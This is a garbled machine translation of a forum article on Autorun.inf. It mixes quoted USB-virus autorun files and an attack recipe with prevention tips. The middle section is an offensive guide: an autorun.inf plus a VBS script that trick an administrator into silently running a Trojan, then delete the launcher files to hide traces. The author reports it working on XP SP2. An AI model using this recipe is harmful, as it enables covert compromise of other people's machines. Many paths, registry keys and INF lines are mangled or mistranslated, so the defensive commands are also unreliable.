New writing, application, and defense of Autorun. inf

The first is autorun. inf.
The content of the common virus Autorun. inf file is
[Autorun]
Open).recyclerrecyclerautorun.exe
Shell1 = Open
Shell1commandcmd.recyclerrecyclerautorun.exe
Shell2 = Browser
Shell2commandcmd.recyclerrecyclerautorun.exe

Shellexecuteapps.recyclerrecyclerautorun.exe
The effect is that when the disk is opened, the file "recyclerrecyclerautorun.exe" will be run. Right-click the file to Open it. The "Open" and "Browser" files will be displayed.
There is also
[Autorun]
OPEN = SVCH0ST. EXE
Shellopen = open (& O)
ShellopenCommand = SVCH0ST. EXE
ShellopenDefault = 1
Shellexplore = Resource Manager (& X)
ShellexploreCommand = SVCH0ST. EXE
For this type of USB flash drive virus, No Matter Right-click to select "open" or "Resource Manager", the virus will run.
A Method for elevation of permission using autorun. inf (transfer)
I have read a lot of articles about the use of AutoRun. inf in the past. The Internet is all the same, imitating each other. Let me add something ~

Let's talk about the principle first. write an AutoRun. the inf file is placed under a drive letter of the other party. When the Administrator double-click the disk, the system will execute AutoRun. the file specified by inf. generally, when there is no operation permission during intrusion, the Administrator will cheat you to run the task ..

I used to see a model on the Internet.

[AutoRun]

Open = the program you want to run

Let's not say whether this operation is successful. If you think about it a little bit, you will know that there is a problem. The Administrator is not a fool, so double-clicking cannot open the drive letter, and people will surely know that there is a problem, so you have a hard time playing ..

As a matter of fact, the file cannot run on my machine, and I have not found a solution on the Internet. I believe there are still many people who have encountered the same problem. Please do it yourself.

It's not hard. Just write it like this:

[AutoRun]
Opentracing autorun.exe
Shellexecuteappsautorun.exe
ShellAutocommand=AutoRun.exe

In this example, you save the token as A. infd file and put it on the C drive. autorun.exe specifies the program to run for you. in this way, you can double-click the drive C to run it successfully. as mentioned above, the C drive cannot be opened, which is easily discovered by the Administrator and needs to be improved. go on!

In fact, it is not difficult to implement this. if inf is uploaded to the C drive, we can make a self-decompressed package and put it under the C drive root directory to make it our designated running file, which contains the program we want to run, such as a Trojan, another VBS script is used to execute the self-decompressed package and then run the VBS script. The content is as follows:

Set yu = wscript. createobject ("wscript. shell ")
Yu. run "cmd/c start WINLOG0N.exe", 0
Yu. run "cmd/c del AutoRun. inf", 0
Yu. run "cmd/c start c:", 0
Yu. run "cmd/c del AutoRun. vbs", 0

In simple explanation, vbshelps us to run winlogon.exe (My configured Trojan) and delete AutoRun. inf: Why delete it? First, reduce the chances of sending it. Second, delete it. After the administrator restarts the host or logs out, if you right-click the drive letter, it will not show "play ", everything is restored before the trojan. Of course, our Trojan has been running. line 4 Code: Open the C drive for him and delete the vbs script itself.

After this improvement, I personally think the security is greatly improved. haha .. you only need to change WINLOG0N.exe in the above script to your own Trojan during the test. The test is successful under winxp sp2.
Prevention Methods
In fact, this file is not a virus. It is also used to open the virus. There are two ways to prevent it: one is to disable automatic playback, the other is to delete it, and the third is to prevent it from being generated.
1. In Windows, you can use the following methods to allow and block automatic operation:

Find the following key in the registry:

Key Path: [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExploer]

The "NoDriveTypeAutoRun" key in the right pane determines whether to perform the Autorun function. Each digit represents a device, and each device is represented by the following value:

The device name. The device name must contain the following values:
DRIVE_UNKNOWN 0 1 01 h unrecognized Type Device
DRIVE_NO_ROOT_DIR 1 0 02 h no driver for the root directory
DRIVE_REMOVABLE 2 1 04 h removable drive
DRIVE_FIXED 3 0 08 h fixed drive
DRIVE_REMOTE 4 1 10 h network drive
DRIVE_CDROM 5 0 20 h Optical Drive
DRIVE_RAMDISK 6 0 40 h RAM disk

Where: retain the drive type not specified for 7 1 80 h

The value "0" indicates that the device is running, and "1" indicates that the device is not running.
As shown above, the corresponding DRIVE_NO_ROOT_DIR, DRIVE_FIXED, DRIVE_CDROM, and DRIVE_RAMDISK can be automatically run. To disable the automatic running of the AutoRun. inf file on the hard disk, you must set the value of the DRIVE_FIXED keys to 1, because DRIVE_FIXED represents a fixed Driver (that is, the hard disk ). If you only want to disable the AutoRun function of the software disc, but retain the automatic playback capability of the CD audio disc, you only need to change the "NoDriveTypeAutoRun" key value to: BD, 00.
In addition, the Group Policy is used to disable automatic playback. However, in some Windows xp versions, this policy does not exist.
2. To prevent autorun. inf from being generated, you can create a folder named autorun. inf under the root directory of the USB flash drive.
3. We can choose to delete files under dos, but in general, autorun. inf has a system, hidden, read-only attribute. Therefore, you should remove these attributes before deleting the file. The specific method is as follows:
Start --- run --- cmd (open a command prompt)
D: dir/a * (No parameter A is visible, and A shows all meanings)
Now you will find an autorun. inf file,
Attrib autorun. inf-s-h-r removes the system, read-only, and hidden attributes of the autorun. inf file. Then you can delete it.
Del AutoRun. inf
2. Common viruses
You can open any file through the autorun file, so it is difficult to say what is common. What I think is interesting is the self-protection method of viruses after they run. For example, if a protection program exists, disable the registry, and disable the show hidden files option or folder option. Hide processes.
1. Disable and deploy the registry.

The best way is to download a registry Repair Tool.
Let's take a look at rising registry Repair Tool http://it.rising.com.cn/service/technology/RegClean_download.htm.
If the problem persists, try the solution on the first floor.
If "running" is disabled, use the method described below

Registry Editor has been disabled. We use the INF file to remove it. We can write the following content in Notepad:
[Version]
Signature = "$ Windows NT $"

[Defainstall install]
ADDREG = Myadd

[Myadd]
; Unban Registry Editor
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableRegistryTools, 1, 0

Save the file as an INF file, right-click the file, and click "Install". ^ O ^
We can see the Signature "$ Windows NT $" next to Signature indicates that my operating system is NT, if your operating system is 98, you should write "$ CHICAGO $" in the subsequent signature ".
Looking at the second CIDR Block, the "ADDREG" on the left of the equal sign cannot be changed. The content on the right of the equal sign is in your mood, but pay attention to it, the statement must be consistent with the statement used in the third CIDR block. Another operation is the same as "DELREG" and "ADDREG", which will be described later.
Okay. Do you want to take a look at this time? Don't worry. It seems that there is something different from the REG file. Oh, I can see that at the end of the file, why? ", "(Note: comma ). What are "HKCU?
This is a different format from REG.
"HKCU" refers to the root key in the registry. "HKCU" is the abbreviation of "HKEY_CURRENT_USER, others include "HKCR" --- "HKEY_CLASSES_ROOT", "HKLM" ---- "HKEY_LOCAL_MACHINE", "HKU" ---- "HKEY_USERS", "HKCC" ---- "HKEY_CURRENT_CONFIG", "HKDD" ----" HKEY_DYN_DATA ". For example, if you want to operate on the root key, you can enter the base according to the abbreviation of "right.
"," (Note: comma), which is the delimiter between the root key and sub-key, sub-key and key name, key and key type, and key type and key value.
Modify the format of the registry key-value CIDR block to: Root Key, subkey, key name, key type, and key value (note: the comma in the middle cannot be omitted ).
In the above file, we know that the DisableRegistryTools key is to be modified and its value is changed to "0 ". Its type is DWORD (dual-byte). In the operations related to the INF file, there are string type (expressed by "0") and binary type (represented by "1 ), the INF file cannot be found on the Internet to indicate double-byte data. Here we can directly use the binary type, so we can see that the key type is "1", and the key value to be modified is "0 ".
As mentioned above, "DELREG" is used to delete a key value. If you want to delete the DisableRegistryTools key, you can write it as follows:
[Version]
Signature = "$ Windows NT $"

[Defainstall install]
DELREG = Mydel

[Mydel]
; Delete the DisableRegistryTools key
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableRegistryTools

The key type and key value fields are omitted, and the file is saved as an INF file. Right-click the file and click "Install.
Well, I don't know if you can understand it. It doesn't matter if you don't understand it. I wrote one. You just need to copy the following content to the notepad, save the file as an INF file and right-click the file ---- click "Install. (Note: This file can solve the problem mentioned above and can only be used in the NT System. The home page will be changed to the homepage of 20CN, and you will make an advertisement ^ O ^ ).

Bytes -----------------------------------------------------------------------------------
[Version]
Signature = "$ Windows NT $"

[Defainstall install]
ADDREG = Myadd

[Myadd]
; Unban Registry Editor
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableRegistryTools, 1, 0
2. Show Hidden system files

Run -- regedit

Hkey_local_machinesoftwaremicrosoftwindowscurrentversionpoliceradvancedfolderhiddenshowall, change the CheckedValue to 1

Note that the virus will delete the valid DWORD Value CheckedValue, create an invalid string value CheckedValue, and change the key value to 0! It is useless for us to change this to 1. (Some virus variants will directly Delete this CheckedValue.